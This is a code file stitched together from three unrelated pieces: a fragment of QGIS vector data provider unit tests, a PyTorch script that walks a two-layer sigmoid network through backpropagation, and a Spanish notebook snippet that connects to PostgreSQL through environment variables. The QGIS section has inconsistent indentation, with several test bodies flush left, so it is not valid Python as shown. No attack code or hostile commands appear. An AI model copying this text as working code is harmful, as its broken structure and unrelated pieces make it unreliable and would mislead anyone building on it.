self.assertAlmostEqual(provider_extent.yMaximum(), 70.8, 3)
# with no points
subset = self.getSubsetStringNoMatching()
self.source.setSubsetString(subset)
count = self.source.featureCount()
provider_extent = self.source.extent()
self.source.setSubsetString(None)
self.assertEqual(count, 0)
self.assertTrue(provider_extent.isNull())
self.assertEqual(self.source.featureCount(), 5)
    def testUnique(self):
        """uniqueValues(): invalid indexes, full value sets, and subsets."""
        # Out-of-range field indexes must yield an empty set, not raise.
        self.assertEqual(self.source.uniqueValues(-1), set())
        self.assertEqual(self.source.uniqueValues(1000), set())
        self.assertEqual(set(self.source.uniqueValues(self.source.fields().lookupField('cnt'))),
                         set([-200, 100, 200, 300, 400]))
        # 'name' holds one NULL alongside the four fruit names.
        assert set(['Apple', 'Honey', 'Orange', 'Pear', NULL]) == set(
            self.source.uniqueValues(self.source.fields().lookupField('name'))), 'Got {}'.format(
            set(self.source.uniqueValues(self.source.fields().lookupField('name'))))
        if self.source.supportsSubsetString():
            # Under a subset string only the filtered values are reported.
            subset = self.getSubsetString2()
            self.source.setSubsetString(subset)
            values = self.source.uniqueValues(self.source.fields().lookupField('cnt'))
            self.source.setSubsetString(None)
            self.assertEqual(set(values), set([200, 300]))
def testUniqueStringsMatching(self):
self.assertEqual(self.source.uniqueStringsMatching(-1, 'a'), [])
self.assertEqual(self.source.uniqueStringsMatching(100001, 'a'), [])
field_index = self.source.fields().lookupField('name')
self.assertEqual(set(self.source.uniqueStringsMatching(field_index, 'a')), set(['Pear', 'Orange', 'Apple']))
# test case insensitive
self.assertEqual(set(self.source.uniqueStringsMatching(field_index, 'A')), set(['Pear', 'Orange', 'Apple']))
# test string ending in substring
self.assertEqual(set(self.source.uniqueStringsMatching(field_index, 'ney')), set(['Honey']))
# test limit
result = set(self.source.uniqueStringsMatching(field_index, 'a', 2))
self.assertEqual(len(result), 2)
self.assertTrue(result.issubset(set(['Pear', 'Orange', 'Apple'])))
assert set([u'Apple', u'Honey', u'Orange', u'Pear', NULL]) == set(
self.source.uniqueValues(field_index)), 'Got {}'.format(set(self.source.uniqueValues(field_index)))
if self.source.supportsSubsetString():
subset = self.getSubsetString2()
self.source.setSubsetString(subset)
values = self.source.uniqueStringsMatching(2, 'a')
self.source.setSubsetString(None)
self.assertEqual(set(values), set(['Pear', 'Apple']))
def testFeatureCount(self):
self.assertEqual(self.source.featureCount(), 5)
if self.source.supportsSubsetString():
# Add a subset string and test feature count
subset = self.getSubsetString()
self.source.setSubsetString(subset)
count = self.source.featureCount()
self.source.setSubsetString(None)
self.assertEqual(count, 3)
self.assertEqual(self.source.featureCount(), 5)
# one matching records
subset = self.getSubsetString3()
self.source.setSubsetString(subset)
count = self.source.featureCount()
self.source.setSubsetString(None)
self.assertEqual(count, 1)
self.assertEqual(self.source.featureCount(), 5)
# no matching records
subset = self.getSubsetStringNoMatching()
self.source.setSubsetString(subset)
count = self.source.featureCount()
self.source.setSubsetString(None)
self.assertEqual(count, 0)
self.assertEqual(self.source.featureCount(), 5)
def testEmpty(self):
    """Check empty()/hasFeatures() on the source, under subset strings, and on editable layers."""
    self.assertFalse(self.source.empty())
    self.assertEqual(self.source.hasFeatures(), QgsFeatureSource.FeaturesAvailable)

    if self.source.supportsSubsetString():
        try:
            # NOTE(review): 'backup' is captured but never restored — the
            # finally block clears the subset string instead. Confirm intent.
            backup = self.source.subsetString()
            # Add a subset string and test feature count
            subset = self.getSubsetString()
            self.source.setSubsetString(subset)
            self.assertFalse(self.source.empty())
            self.assertEqual(self.source.hasFeatures(), QgsFeatureSource.FeaturesAvailable)
            subsetNoMatching = self.getSubsetStringNoMatching()
            self.source.setSubsetString(subsetNoMatching)
            self.assertTrue(self.source.empty())
            self.assertEqual(self.source.hasFeatures(), QgsFeatureSource.NoFeaturesAvailable)
        finally:
            # always restore the unfiltered state, even if an assertion failed
            self.source.setSubsetString(None)
        self.assertFalse(self.source.empty())

    # If the provider supports tests on editable layers
    if getattr(self, 'getEditableLayer', None):
        l = self.getEditableLayer()
        self.assertTrue(l.isValid())

        self.assertEqual(l.hasFeatures(), QgsFeatureSource.FeaturesAvailable)

        # Test that deleting some features in the edit buffer does not
        # return empty, we accept FeaturesAvailable as well as
        # MaybeAvailable
        l.startEditing()
        l.deleteFeature(next(l.getFeatures()).id())
        self.assertNotEqual(l.hasFeatures(), QgsFeatureSource.NoFeaturesAvailable)
        l.rollBack()

        # Call truncate(), we need an empty set now
        l.dataProvider().truncate()
        self.assertTrue(l.dataProvider().empty())
        self.assertEqual(l.dataProvider().hasFeatures(), QgsFeatureSource.NoFeaturesAvailable)
def testGetFeaturesNoGeometry(self):
    """ Test that no geometry is present when fetching features without geometry"""
    # Build the request once, then verify every returned feature is valid
    # yet carries no geometry.
    request = QgsFeatureRequest().setFlags(QgsFeatureRequest.NoGeometry)
    for feature in self.source.getFeatures(request):
        self.assertFalse(feature.hasGeometry(), 'Expected no geometry, got one')
        self.assertTrue(feature.isValid())
def testAddFeature(self):
    """Add two features and verify ids and attributes round-trip.

    If the provider lacks the AddFeatures capability, the call must fail.
    """
    if not getattr(self, 'getEditableLayer', None):
        return

    l = self.getEditableLayer()
    self.assertTrue(l.isValid())

    f1 = QgsFeature()
    f1.setAttributes([6, -220, NULL, 'String', '15'])
    f1.setGeometry(QgsGeometry.fromWkt('Point (-72.345 71.987)'))

    f2 = QgsFeature()
    f2.setAttributes([7, 330, 'Coconut', 'CoCoNut', '13'])

    if l.dataProvider().capabilities() & QgsVectorDataProvider.AddFeatures:
        # expect success
        result, added = l.dataProvider().addFeatures([f1, f2])
        self.assertTrue(result, 'Provider reported AddFeatures capability, but returned False to addFeatures')
        f1.setId(added[0].id())
        f2.setId(added[1].id())

        # check result
        self.testGetFeatures(l.dataProvider(), [f1, f2])

        # add empty list, should return true for consistency.
        # BUG FIX: addFeatures returns a (bool, list) tuple, which is always
        # truthy — unpack it so the assertion actually tests the result flag.
        result, _ = l.dataProvider().addFeatures([])
        self.assertTrue(result)

        # ensure that returned features have been given the correct id
        f = next(l.getFeatures(QgsFeatureRequest().setFilterFid(added[0].id())))
        self.assertTrue(f.isValid())
        self.assertEqual(f['cnt'], -220)

        f = next(l.getFeatures(QgsFeatureRequest().setFilterFid(added[1].id())))
        self.assertTrue(f.isValid())
        self.assertEqual(f['cnt'], 330)
    else:
        # expect fail.
        # BUG FIX: unpack the (bool, list) result — a non-empty tuple is always
        # truthy, so assertFalse on the raw return could never detect success.
        result, _ = l.dataProvider().addFeatures([f1, f2])
        self.assertFalse(result,
                         'Provider reported no AddFeatures capability, but returned true to addFeatures')
def testAddFeatureFastInsert(self):
    """Add features with the FastInsert flag and verify the resulting feature count."""
    if not getattr(self, 'getEditableLayer', None):
        return

    l = self.getEditableLayer()
    self.assertTrue(l.isValid())

    f1 = QgsFeature()
    f1.setAttributes([6, -220, NULL, 'String', '15'])
    f1.setGeometry(QgsGeometry.fromWkt('Point (-72.345 71.987)'))

    f2 = QgsFeature()
    f2.setAttributes([7, 330, 'Coconut', 'CoCoNut', '13'])

    if l.dataProvider().capabilities() & QgsVectorDataProvider.AddFeatures:
        # expect success
        result, added = l.dataProvider().addFeatures([f1, f2], QgsFeatureSink.FastInsert)
        self.assertTrue(result, 'Provider reported AddFeatures capability, but returned False to addFeatures')
        # 5 fixture features + the 2 just added
        self.assertEqual(l.dataProvider().featureCount(), 7)
def testAddFeatureMissingAttributes(self):
    """Verify that features added with too few attributes are padded with NULLs."""
    if not getattr(self, 'getEditableLayer', None):
        return

    l = self.getEditableLayer()
    self.assertTrue(l.isValid())

    if not l.dataProvider().capabilities() & QgsVectorDataProvider.AddFeatures:
        return

    # test that adding features with missing attributes pads out these
    # attributes with NULL values to the correct length
    f1 = QgsFeature()
    f1.setAttributes([6, -220, NULL, 'String'])
    f2 = QgsFeature()
    f2.setAttributes([7, 330])

    result, added = l.dataProvider().addFeatures([f1, f2])
    self.assertTrue(result,
                    'Provider returned False to addFeatures with missing attributes. Providers should accept these features but add NULL attributes to the end of the existing attributes to the required field length.')
    f1.setId(added[0].id())
    f2.setId(added[1].id())

    # check result - feature attributes MUST be padded out to required number of fields
    f1.setAttributes([6, -220, NULL, 'String', 'NULL'])
    f2.setAttributes([7, 330, NULL, NULL, 'NULL'])
    self.testGetFeatures(l.dataProvider(), [f1, f2])
def testAddFeatureExtraAttributes(self):
    """Verify that features added with too many attributes have the extras truncated."""
    if not getattr(self, 'getEditableLayer', None):
        return

    l = self.getEditableLayer()
    self.assertTrue(l.isValid())

    if not l.dataProvider().capabilities() & QgsVectorDataProvider.AddFeatures:
        return

    # test that adding features with too many attributes drops these attributes
    # we be more tricky and also add a valid feature to stress test the provider
    f1 = QgsFeature()
    f1.setAttributes([6, -220, NULL, 'String', '15'])
    f2 = QgsFeature()
    f2.setAttributes([7, -230, NULL, 'String', '15', 15, 16, 17])

    result, added = l.dataProvider().addFeatures([f1, f2])
    self.assertTrue(result,
                    'Provider returned False to addFeatures with extra attributes. Providers should accept these features but truncate the extra attributes.')

    # make sure feature was added correctly: only the first 5 attributes survive
    added = [f for f in l.dataProvider().getFeatures() if f['pk'] == 7][0]
    self.assertEqual(added.attributes(), [7, -230, NULL, 'String', '15'])
def testAddFeatureWrongGeomType(self):
    """Verify that features with the wrong geometry type are rejected, but null geometry is accepted."""
    if not getattr(self, 'getEditableLayer', None):
        return

    l = self.getEditableLayer()
    self.assertTrue(l.isValid())

    if not l.dataProvider().capabilities() & QgsVectorDataProvider.AddFeatures:
        return

    # test that adding features with incorrect geometry type rejects the feature
    # we be more tricky and also add a valid feature to stress test the provider
    f1 = QgsFeature()
    f1.setGeometry(QgsGeometry.fromWkt('LineString (-72.345 71.987, -80 80)'))
    f1.setAttributes([7])
    f2 = QgsFeature()
    f2.setGeometry(QgsGeometry.fromWkt('Point (-72.345 71.987)'))
    f2.setAttributes([8])

    result, added = l.dataProvider().addFeatures([f1, f2])
    self.assertFalse(result,
                     'Provider returned True to addFeatures with incorrect geometry type. Providers should reject these features.')

    # make sure feature was not added
    added = [f for f in l.dataProvider().getFeatures() if f['pk'] == 7]
    self.assertFalse(added)

    # yet providers MUST always accept null geometries
    f3 = QgsFeature()
    f3.setAttributes([9])
    result, added = l.dataProvider().addFeatures([f3])
    self.assertTrue(result,
                    'Provider returned False to addFeatures with null geometry. Providers should always accept these features.')

    # make sure feature was added correctly
    added = [f for f in l.dataProvider().getFeatures() if f['pk'] == 9][0]
    self.assertFalse(added.hasGeometry())
def testAddFeaturesUpdateExtent(self):
    """Verify that the provider extent grows after a feature outside it is added."""
    if not getattr(self, 'getEditableLayer', None):
        return

    l = self.getEditableLayer()
    self.assertTrue(l.isValid())

    # extent of the unmodified fixture data
    self.assertEqual(l.dataProvider().extent().toString(1), '-71.1,66.3 : -65.3,78.3')

    if l.dataProvider().capabilities() & QgsVectorDataProvider.AddFeatures:
        f1 = QgsFeature()
        f1.setAttributes([6, -220, NULL, 'String', '15'])
        # point outside the current extent, so the extent must expand
        f1.setGeometry(QgsGeometry.fromWkt('Point (-50 90)'))
        l.dataProvider().addFeatures([f1])

        l.dataProvider().updateExtents()
        self.assertEqual(l.dataProvider().extent().toString(1), '-71.1,66.3 : -50.0,90.0')
def testDeleteFeatures(self):
    """Delete two features and verify the result; expect failure without the capability."""
    if not getattr(self, 'getEditableLayer', None):
        return

    l = self.getEditableLayer()
    self.assertTrue(l.isValid())

    # find 2 features to delete (those with pk 1 and 3)
    features = [f for f in l.dataProvider().getFeatures()]
    to_delete = [f.id() for f in features if f.attributes()[0] in [1, 3]]

    if l.dataProvider().capabilities() & QgsVectorDataProvider.DeleteFeatures:
        # expect success
        result = l.dataProvider().deleteFeatures(to_delete)
        self.assertTrue(result, 'Provider reported DeleteFeatures capability, but returned False to deleteFeatures')

        # check result
        self.testGetFeatures(l.dataProvider(), skip_features=[1, 3])

        # delete empty list, should return true for consistency
        self.assertTrue(l.dataProvider().deleteFeatures([]))
    else:
        # expect fail
        self.assertFalse(l.dataProvider().deleteFeatures(to_delete),
                         'Provider reported no DeleteFeatures capability, but returned true to deleteFeatures')
def testDeleteFeaturesUpdateExtent(self):
    """Verify that the provider extent shrinks after boundary features are deleted."""
    if not getattr(self, 'getEditableLayer', None):
        return

    l = self.getEditableLayer()
    self.assertTrue(l.isValid())

    # extent of the unmodified fixture data
    self.assertEqual(l.dataProvider().extent().toString(1), '-71.1,66.3 : -65.3,78.3')

    # delete the features with pk 5 and 4, which sit on the extent boundary
    to_delete = [f.id() for f in l.dataProvider().getFeatures() if f.attributes()[0] in [5, 4]]

    if l.dataProvider().capabilities() & QgsVectorDataProvider.DeleteFeatures:
        l.dataProvider().deleteFeatures(to_delete)

        l.dataProvider().updateExtents()
        self.assertEqual(l.dataProvider().extent().toString(1), '-70.3,66.3 : -68.2,70.8')
def testTruncate(self):
    """Truncate the provider and verify all features are removed.

    Expects failure when neither FastTruncate nor DeleteFeatures is supported.
    """
    if not getattr(self, 'getEditableLayer', None):
        return

    l = self.getEditableLayer()
    self.assertTrue(l.isValid())

    # NOTE: the original fetched the feature list here before truncating and
    # never used it; that dead read has been removed.
    if l.dataProvider().capabilities() & QgsVectorDataProvider.FastTruncate or l.dataProvider().capabilities() & QgsVectorDataProvider.DeleteFeatures:
        # expect success
        result = l.dataProvider().truncate()
        self.assertTrue(result,
                        'Provider reported FastTruncate or DeleteFeatures capability, but returned False to truncate()')

        # check result: no features must remain
        features = [f['pk'] for f in l.dataProvider().getFeatures()]
        self.assertEqual(len(features), 0)
    else:
        # expect fail
        self.assertFalse(l.dataProvider().truncate(),
                         'Provider reported no FastTruncate or DeleteFeatures capability, but returned true to truncate()')
def testChangeAttributes(self):
    """Change attribute values on two features; expect failure without the capability."""
    if not getattr(self, 'getEditableLayer', None):
        return

    l = self.getEditableLayer()
    self.assertTrue(l.isValid())

    # find 2 features to change
    features = [f for f in l.dataProvider().getFeatures()]
    # need to keep order here
    to_change = [f for f in features if f.attributes()[0] == 1]
    to_change.extend([f for f in features if f.attributes()[0] == 3])
    # changes by feature id, for changeAttributeValues call
    changes = {to_change[0].id(): {1: 501, 3: 'new string'}, to_change[1].id(): {1: 502, 4: 'NEW'}}
    # changes by pk, for testing after retrieving changed features
    new_attr_map = {1: {1: 501, 3: 'new string'}, 3: {1: 502, 4: 'NEW'}}

    if l.dataProvider().capabilities() & QgsVectorDataProvider.ChangeAttributeValues:
        # expect success
        result = l.dataProvider().changeAttributeValues(changes)
        self.assertTrue(result,
                        'Provider reported ChangeAttributeValues capability, but returned False to changeAttributeValues')

        # check result
        self.testGetFeatures(l.dataProvider(), changed_attributes=new_attr_map)

        # change empty list, should return true for consistency
        self.assertTrue(l.dataProvider().changeAttributeValues({}))
    else:
        # expect fail
        self.assertFalse(l.dataProvider().changeAttributeValues(changes),
                         'Provider reported no ChangeAttributeValues capability, but returned true to changeAttributeValues')
def testChangeGeometries(self):
    """Change geometries on two features (one to null); expect failure without the capability."""
    if not getattr(self, 'getEditableLayer', None):
        return

    l = self.getEditableLayer()
    self.assertTrue(l.isValid())

    # find 2 features to change
    features = [f for f in l.dataProvider().getFeatures()]
    to_change = [f for f in features if f.attributes()[0] == 1]
    to_change.extend([f for f in features if f.attributes()[0] == 3])
    # changes by feature id, for changeGeometryValues call
    changes = {to_change[0].id(): QgsGeometry.fromWkt('Point (10 20)'), to_change[1].id(): QgsGeometry()}
    # changes by pk, for testing after retrieving changed features
    new_geom_map = {1: QgsGeometry.fromWkt('Point ( 10 20 )'), 3: QgsGeometry()}

    if l.dataProvider().capabilities() & QgsVectorDataProvider.ChangeGeometries:
        # expect success
        result = l.dataProvider().changeGeometryValues(changes)
        self.assertTrue(result,
                        'Provider reported ChangeGeometries capability, but returned False to changeGeometryValues')

        # check result
        self.testGetFeatures(l.dataProvider(), changed_geometries=new_geom_map)

        # change empty list, should return true for consistency
        self.assertTrue(l.dataProvider().changeGeometryValues({}))
    else:
        # expect fail
        self.assertFalse(l.dataProvider().changeGeometryValues(changes),
                         'Provider reported no ChangeGeometries capability, but returned true to changeGeometryValues')
def testChangeFeatures(self):
    """Change attributes and geometries together via changeFeatures().

    Expects failure when either ChangeGeometries or ChangeAttributeValues
    is missing from the provider's capabilities.
    """
    if not getattr(self, 'getEditableLayer', None):
        return

    l = self.getEditableLayer()
    self.assertTrue(l.isValid())

    # find features to change (the original fetched this list twice in a row;
    # a single fetch is sufficient)
    features = [f for f in l.dataProvider().getFeatures()]

    # find 2 features to change attributes for
    # need to keep order here
    to_change = [f for f in features if f.attributes()[0] == 1]
    to_change.extend([f for f in features if f.attributes()[0] == 2])
    # changes by feature id, for changeAttributeValues call
    attribute_changes = {to_change[0].id(): {1: 501, 3: 'new string'}, to_change[1].id(): {1: 502, 4: 'NEW'}}
    # changes by pk, for testing after retrieving changed features
    new_attr_map = {1: {1: 501, 3: 'new string'}, 2: {1: 502, 4: 'NEW'}}

    # find 2 features to change geometries for
    to_change = [f for f in features if f.attributes()[0] == 1]
    to_change.extend([f for f in features if f.attributes()[0] == 3])
    # changes by feature id, for changeGeometryValues call
    geometry_changes = {to_change[0].id(): QgsGeometry.fromWkt('Point (10 20)'), to_change[1].id(): QgsGeometry()}
    # changes by pk, for testing after retrieving changed features
    new_geom_map = {1: QgsGeometry.fromWkt('Point ( 10 20 )'), 3: QgsGeometry()}

    if l.dataProvider().capabilities() & QgsVectorDataProvider.ChangeGeometries and l.dataProvider().capabilities() & QgsVectorDataProvider.ChangeAttributeValues:
        # expect success
        result = l.dataProvider().changeFeatures(attribute_changes, geometry_changes)
        self.assertTrue(result,
                        'Provider reported ChangeGeometries and ChangeAttributeValues capability, but returned False to changeFeatures')

        # check result
        self.testGetFeatures(l.dataProvider(), changed_attributes=new_attr_map, changed_geometries=new_geom_map)

        # change empty list, should return true for consistency
        self.assertTrue(l.dataProvider().changeFeatures({}, {}))
    elif not l.dataProvider().capabilities() & QgsVectorDataProvider.ChangeGeometries:
        # expect fail
        self.assertFalse(l.dataProvider().changeFeatures(attribute_changes, geometry_changes),
                         'Provider reported no ChangeGeometries capability, but returned true to changeFeatures')
    elif not l.dataProvider().capabilities() & QgsVectorDataProvider.ChangeAttributeValues:
        # expect fail
        self.assertFalse(l.dataProvider().changeFeatures(attribute_changes, geometry_changes),
                         'Provider reported no ChangeAttributeValues capability, but returned true to changeFeatures')
def testMinMaxAfterChanges(self):
    """
    Tests retrieving field min and max value after making changes to the provider's features
    """
    if not getattr(self, 'getEditableLayer', None):
        return

    vl = self.getEditableLayer()
    self.assertTrue(vl.isValid())

    # initial fixture state: field 0 (pk) in [1, 5], field 1 (cnt) in [-200, 400]
    self.assertEqual(vl.dataProvider().minimumValue(0), 1)
    self.assertEqual(vl.dataProvider().minimumValue(1), -200)
    self.assertEqual(vl.dataProvider().maximumValue(0), 5)
    self.assertEqual(vl.dataProvider().maximumValue(1), 400)

    # add feature pushing the maxima up
    f6 = QgsFeature()
    f6.setAttributes([15, 1400])
    res, [f6] = vl.dataProvider().addFeatures([f6])
    self.assertTrue(res)
    self.assertEqual(vl.dataProvider().minimumValue(0), 1)
    self.assertEqual(vl.dataProvider().minimumValue(1), -200)
    self.assertEqual(vl.dataProvider().maximumValue(0), 15)
    self.assertEqual(vl.dataProvider().maximumValue(1), 1400)

    # add feature pushing the minima down
    f7 = QgsFeature()
    f7.setAttributes([0, -1400])
    res, [f7] = vl.dataProvider().addFeatures([f7])
    self.assertTrue(res)
    self.assertEqual(vl.dataProvider().minimumValue(0), 0)
    self.assertEqual(vl.dataProvider().minimumValue(1), -1400)
    self.assertEqual(vl.dataProvider().maximumValue(0), 15)
    self.assertEqual(vl.dataProvider().maximumValue(1), 1400)

    # change attribute values so the extremes fall back inside [-200, 400]
    self.assertTrue(vl.dataProvider().changeAttributeValues({f6.id(): {1: 150}, f7.id(): {1: -100}}))
    self.assertEqual(vl.dataProvider().minimumValue(1), -200)
    self.assertEqual(vl.dataProvider().maximumValue(1), 400)

    # delete the two added features; ranges must return to the initial state.
    # (The original also fetched features with pk 5 and pk 3 here into unused
    # locals; that dead code has been removed.)
    self.assertTrue(vl.dataProvider().deleteFeatures([f6.id(), f7.id()]))
    self.assertEqual(vl.dataProvider().minimumValue(0), 1)
    self.assertEqual(vl.dataProvider().minimumValue(1), -200)
    self.assertEqual(vl.dataProvider().maximumValue(0), 5)
    self.assertEqual(vl.dataProvider().maximumValue(1), 400)

    if vl.dataProvider().capabilities() & QgsVectorDataProvider.DeleteAttributes:
        # delete attributes
        if vl.dataProvider().deleteAttributes([0]):
            # may not be possible, e.g. if it's a primary key
            self.assertEqual(vl.dataProvider().minimumValue(0), -200)
            self.assertEqual(vl.dataProvider().maximumValue(0), 400)
def testStringComparison(self):
    """
    Test if string comparisons with numbers are cast by the expression
    compiler (or work fine without doing anything :P)
    """
    for expression in (
            '5 LIKE \'5\'',
            '5 ILIKE \'5\'',
            '15 NOT LIKE \'5\'',
            '15 NOT ILIKE \'5\'',
            '5 ~ \'5\''):
        # BUG FIX: the loop variable was ignored and the hard-coded filter
        # '5 LIKE \'5\'' was used on every iteration, so only the first
        # expression was ever actually exercised.
        iterator = self.source.getFeatures(QgsFeatureRequest().setFilterExpression(expression))
        count = len([f for f in iterator])
        self.assertEqual(count, 5)
        self.assertFalse(iterator.compileFailed())
        if self.enableCompiler():
            iterator = self.source.getFeatures(QgsFeatureRequest().setFilterExpression(expression))
            # BUG FIX: recompute the count with the compiler enabled instead
            # of re-asserting the stale value from the uncompiled run.
            count = len([f for f in iterator])
            self.assertEqual(count, 5)
            self.assertFalse(iterator.compileFailed())
            self.disableCompiler()
def testConcurrency(self):
    """
    The connection pool has a maximum of 4 connections defined (+2 spare connections)
    Make sure that if we exhaust those 4 connections and force another connection
    it is actually using the spare connections and does not freeze.
    This situation normally happens when (at least) 4 rendering threads are active
    in parallel and one requires an expression to be evaluated.
    """
    # Acquire the maximum amount of concurrent connections
    # (keeping each iterator alive holds its pooled connection open)
    iterators = list()
    for i in range(QgsApplication.instance().maxConcurrentConnectionsPerPool()):
        iterators.append(self.vl.getFeatures())

    # Run an expression that will also do a request and should use a spare
    # connection. It just should not deadlock here.
    feat = next(iterators[0])

    context = QgsExpressionContext()
    context.setFeature(feat)

    exp = QgsExpression('get_feature(\'{layer}\', \'pk\', 5)'.format(layer=self.vl.id()))
    exp.evaluate(context)
def testEmptySubsetOfAttributesWithSubsetString(self):
    """Verify that requesting no attributes still returns features (and geometry) under a subset string."""
    if self.source.supportsSubsetString():
        try:
            # Add a subset string
            subset = self.getSubsetString()
            self.source.setSubsetString(subset)

            # First test, in a regular way
            features = [f for f in self.source.getFeatures()]
            count = len(features)
            self.assertEqual(count, 3)
            has_geometry = features[0].hasGeometry()

            # Ask for no attributes
            request = QgsFeatureRequest().setSubsetOfAttributes([])
            # Make sure we still retrieve features !
            features = [f for f in self.source.getFeatures(request)]
            count = len(features)
            self.assertEqual(count, 3)
            # Check that we still get a geometry if we add one before
            self.assertEqual(features[0].hasGeometry(), has_geometry)
        finally:
            # always restore the unfiltered state
            self.source.setSubsetString(None)
# ---------------------------------------------------------------------------
# Implements the following 2 layer NN:
# Input=0.8, Bias=[-0.14, -0.11], Weight=[1.58, 2.45], Activation=Sigmoid
# y = sigmoid( -0.11 + 2.45 * sigmoid( -0.14 + 1.58 * 0.8 ) )
# L1 L2
# [0.8] - O - z - O - y
# Bl1=-0.14 Bl2=-0.11
# Wl1=1.58 Wl2=2.45
import torch
from torch import nn
from torch import optim
# Naive implementation: compute the two-layer forward pass by hand.
x = torch.tensor([0.8])
raw_activation = (x * 1.58) - 0.14  # L1 pre-activation: w*x + b with w=1.58, b=-0.14
print("L1 raw activation: {}".format(raw_activation))
z = torch.sigmoid(raw_activation)  # L1 output
print("L1 o/p z: {}".format(z))
y = torch.sigmoid((z * 2.45) - 0.11)  # L2: sigmoid(w*z + b) with w=2.45, b=-0.11
print("L2 o/p y: {}".format(y))
# Create a single layer feed forward network with 1 input and 1 output.
# The weights and biases are auto initialized by pytorch.
l1 = nn.Linear(1, 1)
# Replace the weight and bias.
# Note: nn.Linear expects its weight and bias fields to be Parameters.
# Parameters don't help unless used in the larger context of a nn.Module.
# When used in such a context, these fields will appear in model attributes.
# The bias parameter is a 1d tensor because each Neuron only has 1 bias.
l1.bias = torch.nn.Parameter(torch.tensor([-0.14]))
# The weight needs to be an array of arrays because the Neuron can have any
# number of inputs, and each of those require a weight vector.
l1.weight = torch.nn.Parameter(torch.tensor([[1.58]]))
# This should reproduce the naive L1 computation above exactly.
nn_raw_act = l1(x)
print("nn L1 raw activation: {}".format(nn_raw_act))
nn_z = torch.sigmoid(nn_raw_act)
print("nn L1 o/p z: {}".format(nn_z))
# L2 computed by hand again (weight 2.45, bias -0.11)
nn_y = torch.sigmoid((nn_z * 2.45) - 0.11)
print("nn L2 o/p y: {}".format(nn_y))
# NN defines a Neural Network.
#
# The input weights and bias vectors are expected to be of the same length.
# The number of layers is taken as the size of these vectors, since each layer
# is a 1 input 1 output Neuron.
#
# @weights: a list of weights.
# @bias: a list of bias values.
class NN(nn.Module):
    """A feed-forward network built from 1-input/1-output sigmoid neurons.

    The input weight and bias lists are expected to have the same length;
    that length determines the number of layers, since each layer is a
    single 1-in/1-out Linear neuron followed by a sigmoid.
    """

    def __init__(self, weights, bias):
        super(NN, self).__init__()
        stack = []
        for idx, w in enumerate(weights):
            neuron = nn.Linear(1, 1)
            # nn.Linear requires Parameter-wrapped tensors; weight is 2-d
            # (one row per output, one column per input), bias is 1-d.
            neuron.weight = torch.nn.Parameter(torch.tensor([[w]]))
            neuron.bias = torch.nn.Parameter(torch.tensor([bias[idx]]))
            stack.append(neuron)
        # ModuleList registers each layer so its parameters are tracked.
        self.layers = nn.ModuleList(stack)

    def forward(self, x):
        """Feed tensor `x` forward through every sigmoid layer and return the result."""
        for idx, layer in enumerate(self.layers):
            x = torch.sigmoid(layer(x))
            print("NN L{} o/p: {}".format(idx, x))
        return x
# Build the same 2-layer network with the NN module and run the forward pass;
# the printed output should match the naive computation above.
model = NN([1.58, 2.45], [-0.14, -0.11])
output = model(x)
print("NN Output: {}".format(output))
# Backpropagation
# The dependency graph for this NN:
#
# L1 L2
# [0.8] - O - a(l-1) - O - zl - sigmoid - al(l=2) - predicted - c - MSE = 1/2(al - y)^2
# Bl1=-0.14 Bl2=-0.11 |
# Wl1=1.58 Wl2=2.45 y = real output (1.0)
#
# So we differentiate dc/dal = (al - y)
# Then we substitute al = sigmoid(zl) which means dal/dzl = sigmoid'(zl)
# And we apply the chain rule to compute:
# dc/dbl2 = dc/dal2 * dal2/dzl2 * dzl2/dbl2
# dc/dwl2 = dc/dal2 * dal2/dzl2 * dzl2/dwl2
# dc/da(l-1) = dc/dal2 * dal2/dzl2 * dzl2/da(l-1)
#
# Substituting the following values:
#
# dzl2/dbl2 = 1 (zl2 = bl2 + C)
# dzl2/dwl2 = a(l-1) (zl2 = C + wl2 * a(l-1))
# dal/dzl2 = sigmoid'(z) = sigmoid(z)(1 - sigmoid(z)) where sigmoid(z) = 1/(1+e^-z)
# dc/dal2 = (al-y)
#
# And update the weight and bias of l2 (gradient descent steps against the gradient):
# updated_wl2 = wl2 - dc/dwl2 * step
# updated_bl2 = bl2 - dc/dbl2 * step
#
# Similarly we can compute the updated values of wl1 and bl2:
# dc/dbl1 = dc/dal1 * dal1/dzl1 * dzl1/dbl1
# dc/dwl1 = dc/dal1 * dal1/dzl1 * dzl1/dwl1
#
# And update the weight and bias of l1:
# updated_wl1 = wl1 - dc/dwl1 * step
# updated_bl1 = bl1 - dc/dbl1 * step
# Target (real) output for the loss computation
y = torch.tensor([1.0])
cost = nn.MSELoss()
# Compute MSE for output
loss = cost(output, y)
# Zero out the gradient buffers for all parameters
model.zero_grad()
# Compute dloss/d(parameter) for all parameters which require gradient
loss.backward()
# Define and run the Gradient Descent optimizer.
# This applies the update: parameter -= lr * parameter.grad
optimizer = optim.SGD(model.parameters(), lr=0.1)
optimizer.step()
for i in range(len(model.layers)):
    print("NN: Updated bias for l{} {}".format(i, model.layers[i].bias.item()))
    print("NN: Updated weight for l{} {}".format(i, model.layers[i].weight.item()))
# Forward pass again with the updated parameters
output = model(x)
print("NN: optimized output {}".format(output))
# ---------------------------------------------------------------------------
# gh_stars: 0
# # Conexión a base de datos PostgreSQL
# Esta libreta establece un ejemplo de conexión a una base de datos PostgreSQL utilizando variables de ambiente
# La correcta ejecución de esta libreta incluye los siguientes elementos:
# * existe un archivo `.env` con las variables de ambiente de la conexión en la misma ubicación que la libreta
# * se dispone de una instancia de servicio PostgreSQL con la base de datos `universidad`
# 1. Conexión a la base de datos
# Inicialmente se requiere establecer la conexión con la base de datos.
# Primero se realizan los imports de los módulos requeridos para la tarea
from dotenv import load_dotenv
import sys, os
import numpy as np
import pandas as pd
import pandas.io.sql as psql
# Importa el conector de la base de datos PostgreSQL
from psycopg2 import connect
# Importa la gestión de errores del conector
from psycopg2 import OperationalError
# Carga las variables de ambiente del archivo .env
print("Cargando variables de entorno")
load_dotenv()
PGHOST = os.getenv('PGHOST')
PGPORT = os.getenv('PGPORT')
PGDATABASE= os.getenv('PGDATABASE')
PGUSER = os.getenv('PGUSER')
PGPASSWORD = os.getenv('PGPASSWORD')
print("1. Estableciendo conexión con la base de datos")
# Establish the database connection using the environment variables loaded above.
try:
    conn = connect(
        host=PGHOST,
        user=PGUSER,
        dbname=PGDATABASE,
        # BUG FIX: the password was a redacted '<PASSWORD>' placeholder
        # (a syntax error); use the PGPASSWORD environment variable.
        password=PGPASSWORD,
        port=PGPORT)
    print('Conectado!')
except OperationalError as err:
    # BUG FIX: concatenating the exception object to a str raises TypeError;
    # convert it explicitly before concatenation.
    print('Error en la conexión: ' + str(err))
